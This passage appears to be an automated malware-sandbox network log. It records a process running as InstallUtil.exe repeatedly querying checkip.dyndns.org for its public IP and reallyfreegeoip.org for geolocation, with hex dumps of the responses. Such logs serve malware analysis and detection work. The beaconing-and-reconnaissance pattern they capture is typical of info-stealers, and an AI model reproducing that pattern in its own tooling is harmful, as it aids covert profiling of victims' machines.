                                                                                                            Jan 11, 2025 06:14:34.185796976 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: aa720bdc0bbbac4a0b08849dffc5c16b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 11, 2025 06:14:34.190495014 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:14:34.345936060 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: d6f8e2b6a4f4751daeca5f95992aab75
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 11, 2025 06:14:35.073086977 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:14:35.240240097 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 7de334103b70771f58e47e1b3f8416be
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1049983158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:35.828012943 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:14:36.409315109 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:36 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: a572b98fd41c6549cb343ea53622dd6c
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1049985158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:37.015734911 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:37.588841915 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 5d07f14ecc9e723f67383f9185ffda85
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1049987158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:38.225517035 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:38.793045998 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 625f18951b7cafc7f1884131f6b3d3c1
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.1049989158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:39.387006998 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:39.969633102 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:39 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: db42d4e071047a3b121c15c276a39dc3
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.1049991158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:40.610260010 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:41.184684038 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 5940d8d7738cadd8a7fd2ac7a865eacd
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.1049993158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:41.842418909 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:42.434077978 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:42 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 13dc4e267c324e9cb301d72e7c010aa8
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.1049995158.101.44.242808132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:14:43.047889948 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:14:43.666960955 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: ba8841433bdb1f30aa95da6dae55e9bb
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.1049981104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:14:35 UTC869INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:35 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887264
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDKgiQCWoNCh8MZTBAe05zVacf7RyEbi%2B7NXg0%2F4iz%2FleERKx01LYxD%2BB%2B2JO0RFg2ecqouoqmaWC3WlL6a%2BHJmSGtDt3S%2BUUVIpW3aDJ6D3vrwCA%2B257F3NqO8Nka%2BnM5%2B7JJlO"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026c90b9030f5b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1612&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=10da76ae150091aa&ts=184&x=0"
                                                                                                            2025-01-11 05:14:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1049982104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:14:35 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:35 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887264
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EjgJ3GCYyBKk6QcfiY7CsyOUPcX4pJADGmDFZvM%2BPX1X4wolydGjsbRaoUzmBR6f4VesYe5k2lcTTk0BSMoROucz20XVL1fy5v6YRmX%2F4CP5DJeguTvxBsmVAQ5rerZMMoZPiAU"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026c958de50f5b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1635&rtt_var=618&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1764350&cwnd=221&unsent_bytes=0&cid=6281c889a0e96f4d&ts=114&x=0"
                                                                                                            2025-01-11 05:14:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1049984104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:14:37 UTC855INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:36 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887266
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lhs2KtyVsoXBVMk3GHEY8Y8kciNnZ3Egs5DSjGs7HBV56DNX0K3qN9plv8ibqC1pPeWkMWRTSNtvAMCd6kP0nLXGK%2F82RkNMeG0zsPA%2BGtDiBorAWwoxp%2F7uJnLs9EeriQ7JH6cV"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026c9cefad43b3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1558&rtt_var=797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1211618&cwnd=203&unsent_bytes=0&cid=a861f451ab0ec3d6&ts=140&x=0"
                                                                                                            2025-01-11 05:14:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1049986104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:14:38 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:38 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887267
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1mw6ZxI6uFWnGbBn8clZx%2BTP1h56l8GwqNiMTIcM0WF%2F1fCGngwRKWg54KOoy8uspLN8N1yZglFW7PaSSn6IvsqXY75XocQYplPpEYf1Yn1UjbVmhGO5%2FZ3ANhFQvA0Ru5rmr0I"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026ca47af9424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1547&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=e6683c6d2f2c7301&ts=144&x=0"
                                                                                                            2025-01-11 05:14:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.1049988104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:14:39 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:39 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887268
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJFCBYMH%2FFLncTOZzNeYH5Q%2BUSiiSotS81unUPRKGvuztK2WwGXkDbiKrEvJKyku7vi1%2F6PucLYoH0aQPc9ZObVUQqHy4AjOPijtHoF3pQ%2Fcn1inS3S9WjoXpcO1RpMLPaSP62mT"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026cabca62424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1583&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=f88a08b6c4e0d12a&ts=135&x=0"
